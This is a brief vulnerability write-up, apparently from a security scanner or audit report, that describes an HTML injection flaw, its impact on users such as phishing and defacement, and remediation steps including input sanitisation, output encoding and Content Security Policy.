The application renders user-supplied HTML content without proper sanitization, allowing attackers to inject arbitrary HTML elements into web pages viewed by other users.
An attacker could inject phishing forms, misleading content, or malicious links to deceive users. This can lead to credential theft, social engineering attacks, or defacement.
Sanitize all user input before rendering in HTML context. Use HTML encoding for user-supplied values. Implement Content Security Policy headers. Use allowlist-based HTML sanitizers for rich text content.